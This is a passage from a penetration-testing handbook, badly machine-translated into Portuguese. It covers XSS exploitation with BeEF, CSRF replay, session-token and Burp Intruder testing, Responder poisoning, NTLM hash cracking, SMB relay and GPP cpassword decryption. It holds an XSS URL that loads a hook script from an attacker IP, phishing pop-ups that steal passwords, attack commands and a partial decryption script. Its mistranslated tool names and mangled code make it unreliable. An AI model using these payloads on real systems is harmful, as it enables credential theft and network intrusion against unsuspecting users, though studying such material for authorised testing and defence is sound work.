Esta é provavelmente uma das vulnerabilidades mais comuns que me identifico. Como sabemos, o XSS é um usuário
ataque que é causada pela ausência de validação de dados da aplicação. Existem dois tipos de XSS,
reflexivo e armazenados, que permitem que um atacante para escrever código de script para navegadores de um usuário. eu vou
focar XSS reflexiva como é o mais comum e para a maior parte, a exploração da vulnerabilidade é
relativamente semelhantes.
Beef Exploitation Framework (http://beefproject.com/) (Kali Linux)
A questão geral que recebo de meus clientes é, "quanto dano pode um XSS realmente causar?" Lembre­se
que, com esta vulnerabilidade você tem a capacidade completa para escrever código de script no navegador do usuário final
então qualquer coisa que você poderia fazer em JavaScript poderia ser usado contra a vítima. Nesta seção, vamos mergulhar
em como malicioso você pode estar com um ataque XSS.
A melhor ferramenta que eu já vi para ser usado com diferentes ataques XSS é chamado de Exploração de carne bovina
Estrutura. Se você encontrar um XSS, você pode não só causar uma vítima para se tornar parte de sua pseudo­botnet
você também pode roubar o conteúdo da memória de cópia, redirecioná­los para as ligações, ligue sua câmera e
muito mais.
Se você encontrar um XSS válida em um site, você vai precisar para elaborar suas descobertas XSS para utilizar a carne de bovino
Estrutura. Para nossos exemplos XSS neste capítulo, estamos indo para usar um XSS que foi identificado
dos nossos Burp inicial ativos Scans. Vamos tomar o exemplo URL vulnerável:
http://www.securepla.net/xss_example/example.php?alert=test '<script> [iframe] </ script>
A partir da Configuração de uma caixa de corte Penetração, temos instalado carne em / usr / share / carne de bovino de XSS. Nós estamos
vai ter que primeiro iniciar o serviço de corte:
Começando Comandos carne de bovino:
cd / usr / share / carne de bovino de XSS
./carne
Figura 37 ­ A partir Up carne bovina
Vamos log de dentro da interface do usuário do console depois que o servidor de carne bovina foi iniciado. Como podemos ver na imagem acima, a
URL IU, neste caso, está localizado na http://127.0.0.1:3000/ui/authentication. Podemos abrir um navegador e
ir para essa URL.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 40/115
Figura 38 ­ Carne tela de login
Se tudo começou com êxito, você vai ter que fazer login na interface do usuário usando o nome de usuário e senha
de carne: carne bovina. Se olharmos para a imagem onde nós carregado de carne bovina via linha de comando, vimos um URL
para a página de interface do usuário ea página de gancho (Hook URL). Vamos dar uma rápida segunda e rever a página gancho
(hook.js).
Figura 39 ­ Carne Cliente Side JavaScript
Embora esta tenha sido bem JavaScript ofuscado, esta é a carga útil que vai controlar o utilizador vítima
e será injetado na página do navegador da vítima. Uma vez injetado, o seu navegador irá conectar novamente
em seu servidor central e a vítima não terá consciência.
Então, se nós ter localizado uma vulnerabilidade de XSS em uma página, agora podemos usar carne bovina para ajudar com o
a exploração do utilizador final. No nosso exemplo inicial, http://securepla.net/xss_example/example.php?
= alerta, o alerta variável leva qualquer entrada e apresenta ­lo para o final usuário. Nós pode manualmente adicionar o nosso
O código JavaScript aqui e envie o link para o nosso usuário desavisado. No exemplo abaixo, eu imprimir o
biscoitos DOM do usuário usando o código JavaScript:
<Script> alert (document.cookie) </ script>
Figura 40 ­ Exemplo XSS Finding
Isto prova que o usuário final não processar o código JavaScript incorporado a partir de nossa consulta. Para criar um
sucesso a explorar, em vez de imprimir os cookies, vamos criar uma URL que usa JavaScript para
incluir o arquivo hook.js. Ele será parecido com: http://securepla.net/xss_example/example.php?
alerta = asda <script src = http: //192.168.10.91: 3000 / hook.js> </ script>. Eu era capaz de acrescentar os hook.js
script usando o código JavaScript:
<Script src = [URL com hook.js]> </ script>
Lembre­se que se isso for feito em um local público, em seguida, a URL terá de ser apontando para um público
endereço que hospeda a página hook.js e serviço de escuta.
Depois de enganar uma vítima para ir para essa URL usando engenharia social Tactics, eles serão parte do seu
rede zumbi XSS. Voltando ao nosso painel de interface do usuário, que deve ver agora uma vítima juntou o nosso servidor.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 41/115
Figura 41 ­ Ataques de carne bovina do cliente
Com uma conta enganchada, existem muitos módulos diferentes dentro de carne bovina para explorar o usuário final. Como
a partir da imagem acima, você pode tentar roubar credenciais armazenadas, obter acolhimento informações IP, examinar os anfitriões
dentro de sua rede, e muito mais.
Um dos meus favoritos ataques é chamado de "pequenos furtos" por causa de como é simples. Desça para social
pasta Engenharia e Petty Theft. Configurar o modo como você deseja que ele, neste caso vamos usar o Facebook
exemplo, e bateu executar. Lembre­se do IP para o campo logotipo personalizado tem que ser seu IP carne bovina. Isto é
de modo a vítima pode pegar a imagem do seu servidor.
Figura 42 ­ Petty Theft Facebook Ataque
Após os cliques atacante apresentar, no sistema da vítima uma senha prompt de Facebook irá aparecer.
Isto é onde você pode obter criativo na segmentação de seus usuários e usar um pop­up que seria mais provável
entrar. Se você estiver olhando para ganhar contas do Google, há também um módulo Google Phishing. O objetivo
deste ataque do lado do cliente é que eles não sabem que eles fazem parte desta rede zumbi eo
solicitação da senha deve parecer que não é fora do comum.
Figura 43 ­ Petty Theft Ataque
Após os tipos de vítimas inocentes em sua senha, volte para a interface do usuário para encontrar o seu saque. Clicando sobre
o id 0 mostrará o atacante o que a vítima digitado nessa caixa. Este deve ser o suficiente para iniciar
ganhando algum tipo de acesso como o usuário e se mover lateralmente em todo o ambiente.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 42/115
Figura 44 ­ Petty roubo Resultados
Espero que eu era capaz de demonstrar quão poderosa uma vulnerabilidade de XSS pode ser. É exponencialmente pior
Se a descoberta XSS foi um XSS armazenado versus o exemplo reflexivo que acabamos de ver. Se foram armazenados, nós
provavelmente não precisaria mesmo engenheiro social a vítima a ir para o link, mas apenas esperar até
o nosso código foi executado.
Cross­Site Scripting Obfuscation:
O problema que eu me deparo é que, é muito comum ao descobrir que o aplicativo fornece algum tipo de
validação de entrada para esses campos XSS vulneráveis. Isso significa que o XSS ainda é válido, masvocê não tem
todos os personagens normais você precisa levar com sucesso vantagem dessa vulnerabilidade. A grande coisa
para um pen­tester é estes filtros normalmente são mal configurado.
O problema com esses scripts de validação de entrada, é porque existem tantos tipos diferentes de formas
codificar os seus ataques XSS, os filtros geralmente falham. Você realmente poderia escrever um livro inteiro sobre como
criar diferentes ataques XSS, mas aqui estão meus truques rápida e suja para obter uma lista de trabalho de codificadores.
crowd sourcing
Um dos meus métodos favoritos para encontrar um grande número de vulnerabilidades XSS válidos é visitar
http://www.reddit.com/r/xss. As pessoas vão postar em que os sub­reddit os diferentes XSS descobertas eles têm.
Para extrair essas conclusões XSS, eu criei um pequeno script Python que vai raspar esta sub­reddit para
diferentes achados XSS. Para baixar uma cópia, ir visitar: https://www.securepla.net/script­alertreddit­
. script / A saída vai olhar algo como o seguinte:
Figura 45 ­ XSS crowd sourcing
Como você pode ver, as pessoas têm tentado ofuscar ataques XSS com from­CharCode, codificação por cento,
htmlentities e outros comandos de JavaScript. Agora você está armado com uma boa lista de exemplos de XSS
(Muitos deles deles ainda activo) e codificações. Uma nota adicional rápida é que eu não sei
Recomendamos que você visite o site vulnerável, com as cargas de XSS, como você poderia ser visto como atacando
seu site. O que eu queria fazer era mostrar­lhe uma boa lista de exemplos que podem ajudá­lo em
seus ataques.
Folha OWASP fraude
A outra lista Eu gostaria de mencionar que eu usei muitas vezes é cábula Evasão OWASP. Durante meu
noivados, quando eu me deparo com um problema de codificação este é geralmente o primeiro lugar que eu olho. a fraude
folha pode ser encontrada aqui: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet. O
a maioria das proteções comuns XSS I encontrar são questões de comprimento e que não permitem uma maior / menor do que símbolos.
Felizmente, o OWASP tem muitos exemplos diferentes de contornar esses problemas.
Cross­Site Request Forgery acontece quando você pode forçar uma ação para acontecer a uma vítima que é
indesejado. Meu exemplo típico é que você enviar a alguém um link que está conectado em seu banco
conta. Quando acessar o link que você enviou, ele automaticamente transfere o dinheiro para fora do seu
conta em sua conta. Isso acontece porque não há nenhuma verificação de que o usuário passou pela
processo correto para transferir dinheiro.
O que quero dizer é que a transferência de dinheiro que um usuário precisa de login, vá até sua página de pagamento de transferência, selecione
o destinatário e, em seguida, transferir o dinheiro. Num processo correcto, haveria um token CSRF gerado
em todas as páginas e sempre que você progrediu através da aplicação, que iria verificar o anterior
token. Você pode pensar nisso como rastrear o atual sessão / processo e se qualquer um desses sinais são
vazio ou errado, não processar uma transação.
Há muitas maneiras complexas para testar isso, mas a maneira mais fácil que executar manualmente estes testes é através
o tráfego de proxy. O que vou fazer é exatamente o que eu disse acima e eu vou passar pelo processo de fazer um
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 43/115
operação e ver se eu posso reproduzi­la.
Usando arroto de Ataques de replay CSRF
Vamos tomar o exemplo que uma aplicação bancária permite a transferência de um usuário para outro. No URL
abaixo, existem dois parâmetros que são utilizados. O primeiro parâmetro, o usuário, é que o dinheiro vai para e
o dólar é a quantidade. No caso abaixo, nós com sucesso transferido dinheiro para Frank.
O que aconteceria se eu mandei essa mesma URL para outra pessoa que já foi registrado na mesma
aplicação bancária? Bem, se uma proteção CSRF não estava no lugar, ele iria transferir 123,44 dólares a partir do
acolhimento vítima de Frank instantaneamente.
Figura 46 ­ CSRF Exemplo
Para testar se isso é possível, em primeiro lugar, vamos capturar a solicitação via arroto. Então, certifique­se de que o seu navegador é
ainda proxy para arrotar e fazer o pedido com o usuário 1. Este deve funcionar muito bem como você foi
através dos canais apropriados para fazer a transferência. Você logado, foi para a página de transferência, preenchido na
informações, e submetidos.
No exemplo abaixo, podemos ir para Tab Proxy do arroto e História, para ver nossos últimos pedidos. No
muito inferior, vemos o pedido de transferência bancária. Imediatamente vemos que aqui é um cookie gancho,
mas nada que se pareça com um token CSRF.
Figura 47 ­ Burp CSRF Exemplo
Para validar isso, podemos realmente tentar repetir o pedido. Eu costumo tentar este método, porque ele me diz
instantaneamente se eu posso repetir os pedidos sem ter que executar quaisquer ações adicionais.
Se você clique direito em qualquer lugar do Pedido Raw, você tem uma seleção de "Enviar a Repetidor".
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 44/115
Figura 48 ­ Envio de repetidor do Burp
Dentro do Tab Repeater, pressionando o botão Go vai repetir o pedido e a seguinte resposta será
ser preenchido. O resultado, no nosso exemplo, era que a quantidade foi transferida novamente sem qualquer
verificação de que o usuário realmente queria fazer este pedido. Isso é ótimo porque você pode enviar
todos os usuários deste banco que mesmo link e Frank se tornaria um milionário instantâneo.
Figura 49 ­ Execução de arroto Repeater
O aplicativo não deveria ter permitido ao usuário transferir dinheiro novamente sem passar por todo o
passos necessários para criar um pedidos de transferência. Sem um token CSRF, você poderia ter um desavisado
vítima clica em um link e ter transferências não autorizadas ocorrer. Se você está procurando mais informações sobre
CSRF ataques, experimentarindo para OWASPs página: https://www.owasp.org/index.php/Cross­
Site_Request_Forgery_ (CSRF).
tokens de sessão são geralmente utilizados para sessões de rastreamento já que por padrão HTTP é um protocolo sem estado.
O que você quer procurar em um token de sessão são: (1) o fato de que eles não podem ser adivinhadas e, (2) que
eles controlam adequadamente um usuário. Outras coisas que você deve procurar é quando tokens de sessão expirar, se forem
garantir, que validar a entrada, e que eles sejam devidamente utilizados.
Nesta seção, vamos olhar especificamente certificando­se de tokens de sessão são propriamente
randomizados e que não pode ser adivinhada. Usando arroto Suite para capturar um processo de autenticação, nós
pode ver na resposta que não existe um valor set­cookie para o tokens de sessão. Encontra­se
guia proxy e sub guia é história.
Figura 50 ­ Raw Resposta do Burp
Podemos clique direito dentro da seção resposta cru e envia este pedido para o recurso Sequencer.
Figura 51 ­ enviar o pedido Raw para Sequencer
Depois de clicar em Enviar para Sequencer, pular para o guia Sequencer e identificar qual sessão
símbolos são importantes para você. Depois de escolher o seu símbolo, você pode clicar no Iniciar ao vivo captura para começar
geração de tokens de sessão.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 45/115
Figura 52 ­ Selecionando o token de sessão
Depois de iniciar a captura, uma nova janela irá aparecer e ele vai começar fichas de processamento / geradoras.
Depois de tantas fichas, ele vai te dar resumos de entropia(aleatoriedade), a análise do caráter de nível
(Veja imagem abaixo), e análise de nível de bit. Na imagem abaixo, arroto Suite está analisando a colocação
de cada personagem. Há muitas outras características dentro ferramenta sequenciador de arroto, então eu recomendo
passar algum tempo tentando entender como tokens de sessão são gerados.
Figura 53 ­ Posição de caracteres para biscoitos
Deixo muito aqui no seu próprio julgamento, uma vez que só tem experiência suficiente para entender quando a sessão
biscoitos são ou não são seguras. Toda grande aplicação web que eu vi usa diferentes tipos de
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 46/115
implementações e algoritmos para gerar tokens de sessão, para executar algo como exemplosacima ou rever o código­fonte talvez necessária.
Arroto Suite é extremamente extensível e tem um monte de outras funcionalidades. Uma característica rápida que eu acho
extremamente útil durante o teste manual é a função Intruder. Na função Intruder, você tem a
capacidade de adulterar qualquer parte do pedido e fornecer seus próprios dados. Isto seria muito útil se
Você quer fornecer sua própria entrada fuzzer para testar uma variável.
Estamos indo a pé através de uma visão muito alto nível de como você pode usar o recurso de fuzzing.
A idéia básica do exemplo a seguir é tomar uma loja online e veja porque parâmetro fuzzing pode ser
altamente benéfico. Eles só pode conectar­se a certos itens de seu site, mas os gestores de conteúdo
poderia ter colocado todos os itens de venda na próxima semana. Eles só esperar para a próxima semana e vincular o conteúdo
a partir de sua principal página inicial do site.
Eu costumava ver muitas dessas questões de tipo para sites que fazem vendas Black Friday. Eles têm todo o conteúdo
hospedado, mas não ligada a qualquer lugar em sua página. Na maioria das vezes, eles também listar os preços destes
produtos que não são públicas ainda. Força bruta por todos os parâmetros permite que um atacante sabe
quais itens de venda serão colocados à venda que semana seguinte (antes que o público é notificado).
Eu criei um site fictício para demonstrar este problema exato. O site
www.securepla.net/tehc/hack.php?id=2 tem um GET parâmetro chamado ID. Você pode modificar esse ID campo
1­2 a 3 e obter resultados diferentes.
Figura 54 ­ força bruta Parâmetros
Queremos força bruta através de todos os valores de parâmetros diferentes para ver qual existem páginas e que
páginas não. Desde já temos nosso tráfego fluindo através de arroto, podemos ir à página do Proxy e
para o seu guia Histórico. Você verá todos os seus pedidos anteriores por lá. clique direito sobre esse último pedido e clique
Enviar a Intruder.
Figura 55 ­ A enviar pedido para Intruder
Seu guia Intruder na barra de menu superior acende­se, em seguida, clique nessa guia Intruder. Mover para o
guia posiciona e você vai ver um monte de texto destacado. Desde que eu só estou testando um parâmetro neste
vez, eu vou clique no botão "clear" em primeiro lugar, destacar apenas o valor "2" (como é o único que eu quero
fuzz), e clique no botão "Adicionar" no lado direito (Figura 56). Isto diz Burp apenas fuzz o que quer
valor é alimentado para dentro do parâmetro de identificação e que GET parâmetro será agora amarelo.
Há uma outra seleção de configuração e é o tipo de ataque. Neste caso, eu deixei­o no
tipo padrão de Sniper. Você deve gastar um rápido um rápido segundo e analisar cada um dos diferentes tipos
de ataques no site do Burp Suite: http://portswigger.net/burp/help/intruder_positions.html.
Figura 56 ­ Burp Carga Posições
Passar para a guia Cargas (ainda dentro do separador Intruder) e clique no botão "Load". Neste caso, I
sou somente o carregamento de uma lista de números de 1­100, mas você pode adicionar uma lista de tudo. Se eu sei que o
parâmetro precisa ser manipulado com base no que eu estou interagindo com (poderia ser um banco de dados ou um
consultas LDAP), eu vou importar uma lista desses parâmetros fuzzed. É realmente até você para descobrir quais
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 47/115
tipos de testes que você deve fuzz. De nossa fase de instalação, você deve ter uma lista grande fuzzing localizadaem / opt / SecLists / em sua máquina Kali.
Figura 57 ­ Lista Burp
Depois de ter sua lista de importados, você vai precisar para lançar o ataque Intruder. Na barra de menu superior, vá
a intrusão e iniciar o ataque. Depois de iniciar o ataque, uma nova janela Intruder Ataque irá aparecer e
Arroto vai começar a tentar todos os pedidos de parâmetros.
Figura 58 ­ A partir força bruta em arroto Suite
Figura 59 ­ Resultados arroto Suite
Como os pedidos de começar a preencher, como você pode dizer se um site é diferente, baseada em injeção de parâmetro?
Bem, a maneira mais fácil de dizer é pelo comprimento do código­fonte nessa página quando essa string é
injectado. Se o comprimento do código­fonte é diferente de uma linha de base padrão, isso nos informa que existem
alterações na página.
Se olharmos para os resultados do teste acima, vemos que a partir dos valores dos parâmetros que estão injetando
5­26, o comprimento do conteúdo da página é 509. Esse comprimento fonte de 509 é agora a nossa linha de base para o teste.
Se passar e olhar para todas as respostas de todas as páginas que não são 509 de comprimento, vemos que
solicitar 27, com um comprimento de 456, nos dá a senha: não me cortar (imagem acima).
Você também pode tentar manipular qualquer coisa no pedido inicial. Tente testar valores de cookies,
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 48/115
GET / POST / parâmetros HEAD, cordas user­agent, e outras áreas vulneráveis ​​possíveis.
Quero salientar um aspecto adicional ao testar um aplicativo. Como este livro é realmente apenas dando um
visão de alto nível em testes de aplicações web, testes funcionais é realmente onde você tem seu dinheiro.
Quando digo testes funcionais, eu vejo isso como teste verticais direitos de usuário, fluxo horizontal / application
teste, e ter certeza que as coisas funcionam como deveriam. Por exemplo:
Testando que os usuários não são capazes de ver os dados confidenciais de outros usuários.
Os usuários comuns não podem acessar páginas administrativas.
Os usuários não podem alterar valores de outros usuários de dados.
Os fluxos de trabalho não podem ser modificados fora do seu fluxo pretendido.
Se você estiver interessado em aprender mais, pode visitar
https://www.owasp.org/index.php/Web_Application_Penetration_Testing.
Isto é onde os testadores de sucesso passam a maioria do seu tempo. Qualquer pessoa pode executar scans, mas se você é um
eficaz e eficiente Manual Tester, que são ligas acima da norma.
Em um teste de penetração nível de rede, o tempo é da essência. Você precisa ter uma sólida compreensão
subjacente infra­estrutura, aplicação e possíveis vulnerabilidades. Este capítulo deve ter
ajudado a compreender a visão geral de alto nível de vulnerabilidades, como identificá­los, e que tipo de
impacto que pode ter se que a vulnerabilidade não é resolvido.
vulnerabilidades da Web será, provavelmente, a vulnerabilidade mais comum que você vai identificar em um link externo
teste de penetração. Agora você deve ser capaz de demonstrar como tirar proveito dessas questões em um
forma simples e rápida.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html49/115
A jogada de passe lateral é usado quando você não consigo seguir em frente. Você pode estar em uma rede, mas
sem privilégios ou credenciais de conta, você normalmente ser preso em uma caixa. Como testador, onde você
começar a destaque é quando você é capaz de se mover através da rede e obter acesso ao domínio
contas administrativas. Uma coisa que eu salientar como um testador de penetração é que isso não deve ser sua única
objetivo. É tão importante ser capaz de identificar onde os dados confidenciais estão sendo armazenados e ganhando
acesso a esses ambientes. Isso pode exigir girando através de empregados essenciais e
a compreensão de como os segmentos corporação seus dados.
Esta seção será focada em mover­se através da rede e tentando ir de se tornar uma limitada
do usuário todo o caminho para possuir toda a rede. Nós vamos cobrir temas como iniciar sem
credenciais, proxy através dos anfitriões, que têm credenciais de domínio limitado e, em seguida, com local / domínio
credenciais.
Vamos dizer que você está na rede, mas você não tem nenhuma credencial ainda. Talvez você rachou sua
password WPAv2 pessoal Wi­Fi ou estalou uma caixa que não estava ligado ao domínio. Eu poderia primeira
ligar tcpdump para ouvir passivamente, identificar a rede, encontrar os controladores de domínio, e outros
Tipos de passivos ataques. Uma vez que eu sinto que tenho uma compreensão da rede local, eu vou começar
comprometer os sistemas que usam uma variedade de ataques especificados nas próximas seções.
(Https://github.com/SpiderLabs/Responder) (Kali Linux)
Uma ferramenta que me ajudou a ganhar o meu primeiro conjunto de credenciais é chamado responder.py. Responder é
uma das primeiras ferramentas que escuta e responde a LLMNR (Resolução nome do link local Multicast) e
NBT­NS (NetBIOS sobre Name Service TCP / IP).
O outro Responder vulnerabilidade leva ativamente vantagem de é a vulnerabilidade WPAD. Você pode
leia mais em um artigo Technet aqui: MS12­074 ­ Dirigindo uma vulnerabilidade no arquivo PAC do WPAD
manipulação (blogs.technet.com/b/srd/archive/2012/11/13/ms12­074­addressing­a­vulnerability­in­wpad­
s­pac­file­handling.aspx). Os princípios básicos são de que , quando um navegador (IE ou rede LAN configurações) está definido para
detectar automaticamente as configurações, o anfitrião vítima vai tentar obter o arquivo de configuração da rede.
Figura 60 ­ Detectar configurações automaticamente
Como o atacante, uma vez que estamos na mesma rede que nossas vítimas, podemos responder a resolução de nomes
e injetar o nosso próprio arquivo PAC e um proxy de todo o tráfego web. Desta forma, também pode forçar o usuário a
autenticar os nossos servidores SMB. Você pode perguntar: "Por que isso é importante"? Se pudermos obter o
anfitrião da vítima para autenticar contra os nossos servidores SMB, podemos solicitar seu desafio NTLM / resposta
hashes sem alertar a vítima que qualquer coisa está mal configurado. Se o usuário já está autenticado
ao domínio, eles vão tentar usar essas credenciais para autenticar os nossos servidores.
Se você quiser ver o que todos os comandos são para Responder, e ver a documentação para ele, visita
https://github.com/SpiderLabs/Responder. Se você já foi a seguir o Setup fase, que deve
já tem Responder instalado e vamos mergulhar na direita.
No exemplo abaixo, começamos Responder com algumas bandeiras diferentes. Primeiro, a bandeira "­i" é para o IP
seu anfitrião, o "­b" bandeira é Off para autenticação NTLM, e ­r está definido para Off, uma vez deixando­a poderia
quebrar as coisas na rede:
python ./Responder.py ­i [atacante IP] ­b Off ­r Off ­w On
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 50/115
Figura 61 ­ Responder.py
Uma vez que responde começa a funcionar, você deve dar­lhe alguns minutos para ser capaz de identificar os pedidos e
enviar respostas maliciosas. Abaixo está este ataque em andamento.
Figura 62 ­ Resultados de Resposta
Há um monte de coisas que aconteceram uma vez Responder.py estava correndo. Primeiro, vemos que o LLMNR
foi envenenado para 192.168.0.2 e um arquivo WPAD malicioso foi enviado para a vítima. Isto significa agora tudo
seu tráfego web vai usar a nossa máquina atacante como um proxy. Isto também significa que qualquer coisa em texto claro
é visível para nós. Em segundo lugar, vemos que agora estão seguindo os biscoitos para qualquer site que o usuário
visitas. Se eles vão para um site através de HTTP após a autenticação, agora podemos tornar­se seu usuário como todos nós temos
seus cookies. Finalmente, e este é o mais importante, vemos o desafio NTLM / resposta hashes embora
nossos ataques injetado.
Nós temos um par de problemas com esses hashes embora. Nós realmente não podemos usar esses hashes direita
longe de qualquer tipo de tipo pass­the­hash que estes são os hashes de desafio NTLM / resposta. O que nós
pode, então, fazer com esses hashes é utilizar John the Ripper ou oclHashcat.
John Exemplo:
$ Hashes.txt gato
cheetz :: FAKEDOMAIN: 1122334455667788: 4D8AABB385ADC35D8ABF778E9852BC27: 0101000000
$ John ­format = netntlmv2 hashes.txt
Carregado 1 hash de senha (NTLMv2 C / R MD4 HMAC­MD5 [32/32])
password (cheetz)
Exemplo oclHashcat:
­m 5600 password_file.txt hashes.txt cudaHashcat­plus64.exe
Estes dois exemplos de quebra de senhas vão levar para a senha secção de fraccionamento, mas
queria dar­lhe um rápido gosto de quão poderoso que responde é.
Às vezes não vale a pena para tentar quebrar a senha. Se você sabe que eles têm uma senha complexa
política ou não há número suficiente de usuários on­line para obter vários hashes, você também pode querer experimentar SMB
ataques de repetição. Em vez de permitir que o servidor SMB em Responder, se a vítima permite NTLMv1
autenticação, vocês posso habilitar Metasploit de smb_replay módulo (uso
Exploit / windows / SMB / smb_replay). Isto significa que agora que quaisquer solicitações SMB será encaminhada para um
servidor de sua escolha e seus hashes desafio será autenticado contra o servidor. Digamos
você é capaz de fazer isso contra um administrador de TI, as chances são de que vai ter encaminhado privilégios no
servidores que você identificou.
Se você tem que ir por esse caminho, eu recomendo que você assista ao vídeo https://www.youtube.com/watch?
v = 05W5tUG7z2M por Rob Fuller. Ele fala sobre usando ZachAttack para ajudar a gerenciar toda a NTLM
sessões e continuamente comprometer a rede.
Uma coisa que eu tive problemas com é se os usuários finais ou servidores são configurados de forma que apenas
permite conexões NTLMv2, essas ferramentas irá falhar. A única maneira de eu ter sido bem sucedida em SMB
ataques de repetição para autenticação NTLMv2 está usando a estrutura de impacto. Você pode baixar uma cópia
aqui: http://code.google.com/p/impacket/.
I originalmente encontrada a configuração do Impacket de http://pen­test­ing.sans.org/blog/pen­
testing / 2013/04/25 / SMB­relay­desmistificou­and­NTLMv2­Pwnage­com­python, que passa por cima exatamente
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 51/115
como configurar isso tudo. Não vou entrar em muitos detalhes, como você pode visitar o site SANS para mais detalhes,
mas você pode criar um executável Meterpreter e executar o script python.
Figura 63 ­ smbrelayx.py
Depois de receber uma ligação SMB, ele vai repetir o SMB contra outro servidor e soltar / execute
o binário Meterpreter inversa. Nós falaremos mais tarde sobre a criação de conchas reversa na Evading AV
Seção.
Esta seção assume que você está em um host que está conectado no domínio do Active Directory. você pode
não ser um administrador de domínio,mas tem alguns privilégios na rede. A esperança aqui é para ser capaz
para escalar os seus privilégios de um usuário de domínio regular para um domínio de usuário administrativo / local. Vamos
passar por cima de alguns ataques que podem ajudar a aumentar a sua conta para a conta do administrador de domínio.
Você já bateu uma caixa dentro da rede que tenha acesso ao domínio, mas você só pode ser um
usuário sem privilégios regular, não um administrador. Este é um momento perfeito para ver se você pode tirar vantagem do
Grupo vulnerabilidade política de preferência. Vamos dar um passo para trás e descrever Preferências de Política de Grupo
(GPP). GPP são extensões para o Active Directory e são definições configuráveis ​​que são usados ​​com o Grupo
Objetos de Política (GPO).
Este é um recurso poderoso para tornar a vida de um sysadmin muito mais fácil e implantando configurações de GPO
dentro de todo o ambiente. O problema com uma das características é que você pode criar / atualização local
administração de contas a todos os anfitriões dentro do domínio. Por que alguém iria usar esse recurso? Pode ser
porque eles querem empurrar um novo usuário administrativo local em cada host ou atualizar a senha para uma
conta local em cada máquina (mais comum do que você imagina). Uma vez que esta configuração é definida
e GPOs são atualizados, todas as estações de trabalho terá agora esta conta. O problema é que este
informações (nome de usuário / senha da conta de administrador local) tem de ser armazenado em algum lugar e no GPP de
casos, eles são armazenados no domínio legível por qualquer conta de usuário do AD.
As informações detalhadas para todas as contas empurrou via GPP serão armazenados em \\ [Domain
Controlador] \ SYSVOL \ [Domínio] \ Policies. Você pode simplesmente procurar o Groups.xml arquivo dentro dessa
pasta. Se você é capaz de encontrar um desses arquivos, você pode olhar dentro do arquivo Groups.xml para um
hash de cpassword. Ele será parecido com isto:
<Propriedades action = "U" userDSN = "0" dsn = "teste" driver = "SQL Server" description = "fonte de dados de teste"
username = "testusername" cpassword = "AzVJmXh / J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" />
O problema com a variável cpassword é que a senha é criptografado com AES. Felizmente para nós,
A Microsoft também lançou as chaves AES simétricas publicamente. Esta chave é a mesma chave para todos os
ambiente em qualquer domínio.
Figura 64 ­ AES­chave da Microsoft7
Uma vez que temos as chaves de criptografia, podemos decifrar as senhas das contas administrativas locais
dentro de GPP. Existem muitas ferramentas diferentes de fazer isso, mas desde que aqui é um script python para reverter
a senha criptografada. Nós falaremos mais tarde sobre como podemos fazer isso com o PowerShell, mas como eu não gosto
para obter específica ferramenta aqui é uma maneira simples para completar a sua tarefa.
#! / Usr / bin / env python
N.ºCODE de http://pastebin.com/TE3fvhEh 8
# Gpprefdecrypt ­ descriptografar a senha de usuários locais adicionados via Windows Diretiva de Grupo 2008
Preferências. Esta ferramenta decifra o valor do atributo cpassword incorporado no arquivo armazenado Groups.xml
na partilha SYSVOL do controlador de domínio.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 52/115
sys importação
da AES importação Crypto.Cipher
de base64 b64decode importação
if (len (sys.argv) = 2!):
print "Uso: gpprefdecrypt.py <cpassword>"
sys.exit (0)
# Init a chave do MSDN: http://msdn.microsoft.com/en­us/library/2c15cbf0­f086­4c74­8b70­
1f2fa45dd4be% 28v = PROT.13% 29 # endNote2
=­Chave "" "
4e 99 06 e8 fc B6 6c C9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 B6 6c 1b
"" ".replace (" "," "). Replace (" \ n "," "). Decodificar ( 'hex')
cpassword = sys.argv [1]
